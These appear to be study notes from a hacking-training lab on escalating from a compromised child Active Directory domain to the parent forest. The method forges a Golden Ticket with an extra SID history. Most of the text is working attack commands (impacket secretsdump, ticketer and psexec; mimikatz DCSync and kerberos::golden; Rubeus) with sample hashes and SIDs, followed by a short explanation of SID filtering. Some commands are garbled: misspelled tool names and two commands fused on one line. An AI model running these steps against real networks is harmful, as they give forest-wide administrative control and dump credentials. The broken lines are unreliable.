## Linux
##### AUTOMATED
Only need to specify the parent domain controller and child domain domain admin
```bash
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
```
##### Manual
Obtaining the KRBTGT Account's NT Hash using `secretsdump`
```bash 
impacket-secretsdump logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
```
Obtain Domain SID with `lookupsid`
```powershell
impakcet-lookupsid logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"
```

> [!NOTE] Note
> `lookupsid` will give us back the SID for the domain and the RIDs for each user and group that could be used to create their SID in the format `DOMAIN_SID`-`RID`. For example, from the output below, we can see that the SID of the lab_adm user would be `S-1-5-21`-`2806153819`-`209893948-922872689(DomainSID)`-`1001(RID)`.

Obtain Enterprise Admins SID of parent domain
```bash
impakcet-lookupsid logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"
```
Create Golden ticket with `ticketer`
```bash
impacket-ticketer -nthash <krbtgt hash> -domain <ChildDomain> -domain-sid <CDomainSID> -extra-sid <EAdminsSID> Adot

impacket-ticketer -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 Adot
```
Set KRB5CCNAME Environment Variable
```bash
export KRB5CCNAME=Adot.ccache 
```
PSexec on parent domain DC
```bash
impacket-psexec LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
```

-----------------------
## Windows
Obtaining the KRBTGT Account's NT Hash using `mimikatz`
```powershell
lsadump::dcsync /user:LOGISTICS\krbtgt
```
Obtain Domain SID with `PowerView`
```powershell
Get-DomainSID
```
Obtain SID for the Enterprise Admins group in the parent domain
```powershell
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
```
Perform SIDInjection and Golden Ticket creation with `mimikatz`
```powershell
kerberos::golden /user:hacker /domain:<ChildDomain> /sid:<CDomainSID> /krbtgt:<hash> /sids:<EAdminSID> /ptt

kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
```
**Alternatively** with `Rubeus`
```powershell
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
```
Confirm
```powershell
klist
```
List C: drive on parent domain controller
```powershell
ls \\academy-ea-dc01.inlanefreight.local\c$
```
Perform DCSync on parent domain users
```powershell
lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCALGet-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
```

## SID History Primer

The [sidHistory](https://docs.microsoft.com/en-us/windows/win32/adschema/a-sidhistory) attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain.

SID history is intended to work across domains, but can work in the same domain. Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. When logging in with this account, all of the SIDs associated with the account are added to the user's token.

This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001/) or a Kerberos ticket-granting ticket (TGT), which will allow for us to authenticate as any account in the domain of our choosing for further persistence.

## ExtraSids Attack - Mimikatz

This attack allows for the compromise of a parent domain once the child domain has been compromised. Within the same AD forest, the [sidHistory](https://docs.microsoft.com/en-us/windows/win32/adschema/a-sidhistory) property is respected due to a lack of [SID Filtering](https://www.serverbrain.org/active-directory-2008/sid-history-and-sid-filtering.html) protection. SID Filtering is a protection put in place to filter out authentication requests from a domain in another forest across a trust. Therefore, if a user in a child domain that has their sidHistory set to the `Enterprise Admins group` (which only exists in the parent domain), they are treated as a member of this group, which allows for administrative access to the entire forest. In other words, we are creating a Golden Ticket from the compromised child domain to compromise the parent domain. In this case, we will leverage the `SIDHistory` to grant an account (or non-existent account) Enterprise Admin rights by modifying this attribute to contain the SID for the Enterprise Admins group, which will give us full access to the parent domain without actually being part of the group.

To perform this attack after compromising a child domain, we need the following:

- The KRBTGT hash for the child domain
- The SID for the child domain
- The name of a target user in the child domain (does not need to exist!)
- The FQDN of the child domain.
- The SID of the Enterprise Admins group of the root domain.
- With this data collected, the attack can be performed with Mimikatz.
